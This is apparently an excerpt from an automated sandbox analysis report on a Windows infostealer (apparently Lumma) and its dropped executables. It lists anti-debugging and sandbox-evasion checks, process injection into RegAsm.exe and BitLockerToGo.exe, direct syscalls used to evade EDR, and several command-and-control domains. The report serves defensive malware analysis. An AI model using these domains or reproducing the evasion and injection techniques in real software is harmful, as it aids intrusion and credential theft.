Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3124653111.0000000001028000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: KWDYALOFJGZUXTEBGMAEYQJZQEJUSHGFSJJHXIAWXETHZSZCXATOVIRUNEH
Source: FileApp.exe, 00000000.00000002.2120357581.0000000003221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q1BODKZWBQQMLCMYVMCIXXAQEPJMQHJSTTKQSTJDLWPIDAGHWDTXN`
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3380418917.0000023733E2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: XLPHGFSPQHIXQJMWIYQNEBJBPSRAXIXVQJURCRMXGFAG
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: vMciv4FTWk
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3124653111.0000000001028000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NQPLQEMUWDVSEGGAGTZFUSSKMLSWZZHLRDKHCPZQSKPE
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: hCLzvwEjrpbnzEwhXNXFGBXIZAYKTKFHNSJMXXSQXPDUPPISSNNZVDVOZHMLXRYKJQLBNJWUMPLHSGRTKZEHDCQNEPVFRWODTRYSNEDBETDHjLQKFJELXWCCPPPTLBRSPXGPTYVBWSUTVKRBACAXUAXCVJHNSYEFTQ4TVZLTIRMSALDCPEFWEYSSXCFHRBIGFOGEMHRISPNAWFSXDYPHYCLTNNCMKGP0HDPHSAHCDMQZEFXMZIVMVHGH>HDFRATRTNLSGHZWIZIRXFENQEEZPWRX@DMFBDPONVTBWVOAXTZSGJYCEBTAJQMTE*RSPSJGNNTAZNTHOEZKMSD`RIETTMIEZEYBRQJRNHSEMVSNUJHCJWLGNVQIDRRMWTZMIMILNTUANEPZFLPZQKLGHHGJKDTAPSAMTKGLNIEDKATDJVDDFVEEMHFIVHNDTRSIODDMDGNZSTOVDQOYZM6VMVKIAJAGEUTMHWUQUAJWGFJCDYbNZJKWACNUZWQXMKJTABCEYFTTVOGUUYUFQGAJYBOVVYQVRSUBTRZQDEQEOEROXTQXRDXDEODFNXKIHCZEWREOWTTYRXC:UIXMFMRGOBBYKZLHLBCTUBZCVNIUK2LPOLHALZEADMFBLFEADBNRUFEJZHIXWULRQTPZFTKNACEGTQFAPYHDPYDHLLIVV8OLMVCVQXIEXFCTZTNNHRRCMDXZIG(LVDQPIOMZJYCMKFTNODZfORYFNDQNGAADYLKKRCILOIDAYDOEPIHMUJKYCYNENGZIXIWCXKFfVLWACCLOYZGETQAJUDREGEFFSJYBMVQIWOEVGLZJJZKYSNCBBTLjPCLUSHWYCDMGKISISZFXQNFXCWKMTTYJHDDHPKPSRRNASZONOGBGR<GLBUXMWNNYZIJDNECORDWZMIYZCTSA.ANHNKGZTWXJCVNGSZFZYWGI*DQGYOQNENCSDMBIIGZFWQ>NJVEXNXMCCREESHHYHQBSCOIBEMTYRHnFTJQDGKIZKDHFHEFMDVUSASKFKJOVQIMQCZVJNZXWGMKJVOSYJZSXIE4GZCMALKPIHQZXYXIEBNWATMTUH\SHWPGTJQWTVIAUWTQFUITIFJVCRPKPBFCWRMNKRCHGNVBB@GVAFOARNLNFWZVBTVTYQTMTSVRUTSHQF*LGJBVHJIFWEUKOYHPFFQZHSZFZACAAUQEMRTBEWGHQFZQVDEYVWXEOTZDUbJFJTZFSOXUYUJKEFULLZHBXBJEZNXPOQHVKEELTDQHYKGINBK,KLPMOLLFUOJEJCGRWNAEYDLRSDDNXCPPOHZZAHHDUOAEKTTDYZELHSPUXQXWEFCGNDHCFJUWRHMHMEMVPLFUAIBFHFTBPKJHTVLIEHGFCCUZPSGGYEOJBQIEZNRFRSFCZXJAYADMXXTKP:RHGKLDDGTRRMVWKJMXNKBIDNUOKQGDOYQHLWVAHOCVBIOUYRWVYOTHLMCRCAKLYNVKAEJWYUEXGDQWNOJJFZCGRBGTZCLZTUNRJDTABXTZLJ6UTXDLIYRSQOPKDBSOPAOKRZZMAZHKZRATLHQSUDUXQKJQVKGDBHDXSJUAVHPYOBB4THOKGCFDNQQBWZGCSSNEGDXAWWXLVXIQODTIPHZBESTOIIFBQZZYALBBIXTSNJTSYFGVYJYLQBWTNUATMOUYFVPVKVSWSQGBGCOYRVWTOSEMKO:YKTUJTZIFAYDQPBEZPSVIBMVCLMAJbBODKZWBQQMLCMYVMCIXXAQEPJMQHJSTTKQSTJDLWPIDAGHWDTpSDMQWYAXEEZWTFDQNWMYYRHWXKLQHYULQPVZVOZGWJERCCXQYPSRDBZA\JZVNUEPUZXCOHYXBIXXTHBKZXKMENNCPQHOOCSKRLUZZBU0JEZKZRRKYGZFBZZANNEPWBXVhNADKTONGHAOGIGIHEHBTZKBBUGOZLOQBBUIAULKJKLRWQYQHSFHPZRWHDCCPPCMEHGLRDZQTIOJPAGQGWJBTAVWYVYQVWTXVIObFASDLKNWEIUWOQOGMFUDQQNSMETQOSUKBARVPLPLPJOFHRCMT6DHKHFEQPKVBFUICMRSSCHKHGSDHDEQSTSXTUOBFMBZUHIZPKVCEYQFRJNNOQSVhWZUQVXLXPDLVVHCVQLMYQOQIMBGFPNMZZHLDUEFHDAYKBHSYKYKHLBRPNXAMMEXLEICPSQASKFOXAKQWFNYLMDDQCSN0HDHYGMYAFMMADBFVFXAHJUYWLVWJWIPAPSGTNFKHUYZIIJDWTLVOENQMKEMBVCR*AKNDHULOHYDMKVGEBMCUKXBSHCOQTCIEJVEGROPHJGXWFLGUYDXTOWGKTCGDOLFYWFjUTYUNXFPVPTERQHYGJXLKEVNYDWIVBZXJQAEVKUMXLBRKNMWGQVARvLGMMMTHMSAUPNSPKWFXSIDYLGVDORGTZRGMZWSXMDATKGCUIYIOBFVQIIAF8EAUPJRSTWQERVNGWLGGDLEOCIULT<GXALPBIVLOIDYAJCURHEHUIBBDDVVPfQVIXYNZAAMYGGMGHHQBSSTJIIAGJHEMWMVJMZMEDZMBYLHXOLHVbLBYXFWJUFYJNMLRYABOBVFZDOVPSRMAQCSSSJYGBKLMNNNQGFlWZHVFCYAKPGBBJHQWPVEVVEXHYLSDRAMLSIHXBYLQTOISFGRFIVIFV`WGYUYFMOVRCWXNZQUNFHYPDGKDGMTFIFVYKJTMOIBCZTTZVK(KNTNMYRUGYMDDIFSAYUZNGWWXDXQFOBYLRPTMGOGBFKCWKMZUDMPTWZUXONV`QXIFHNZGXFNADAIVXXLBVXSHUUJCXCEXDVTQFKGOCZPJHOKDbMSETADBRRLEXYTHZYPGFZUAQEASPAMBQEVTZLXBFLYAVPHBBZrUBCHXJBUZHULAOZCRJMORPTXMMRAVUPGKQYBXARRMGUTATAIAOZSNKGFIHHHAYIBSKUVCAXEMJLVRDFYKBVPYXMWAQNHLKbFJWZCSDUXYULNPTCEDDJNZQTLGT
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware.(
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2650297590.000000000146C000.00000004.00000020.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2684793497.000000000190E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: DEURKUJUSGIWVQOPRPWDRMHVYYEHDFBZIPNXTCMQEMUHYDLVICQWEFGRWZTLPCRMFJNFCQWPCFY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: regmonclass
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: ollydbg
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: filemonclass
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: NTICE
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: SICE
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_0041ACFA
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00404610 VirtualProtect ?,00000004,00000100,00000000 22_2_00404610
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress, 14_2_00406312
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h] 2_2_00432CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h] 2_2_00432CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00419160 mov eax, dword ptr fs:[00000030h] 22_2_00419160
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 22_2_00405000
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041C8D9 SetUnhandledExceptionFilter, 22_2_0041C8D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0041A718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CBAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_69CBAC62
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Code function: 5_2_030E2591 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 5_2_030E2591
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x140F68E97 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x14184DA5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x140F42CBC Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtClose: Direct from: 0x141791AC9
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x14183B5C6 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtMapViewOfSection: Direct from: 0x1417C8CFD Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtOpenFile: Direct from: 0x141829079 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x140F741E1 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x141821A46 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtUnmapViewOfSection: Direct from: 0x14181B636 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x141817E99 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Indirect: 0x140F2B0BD Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Memory written: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory written: C:\ProgramData\jewkkwnf\jewkkwnf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Memory written: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe base: 400000 value starts with: 4D5A
LummaC encrypted strings found
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: caffegclasiqwp.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stamppreewntnq.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stagedchheiqwo.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: millyscroqwp.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: evoliutwoqm.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: condedqpwqm.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: traineiwnqo.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: locatedblsoqp.shop
Searches for specific processes (likely to inject)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 22_2_004190A0
Writes to foreign memory regions
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56B000 Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000 Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000 Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D8000 Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A0B008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 484000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10F1008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 60A008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 651000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 652000 Jump to behavior
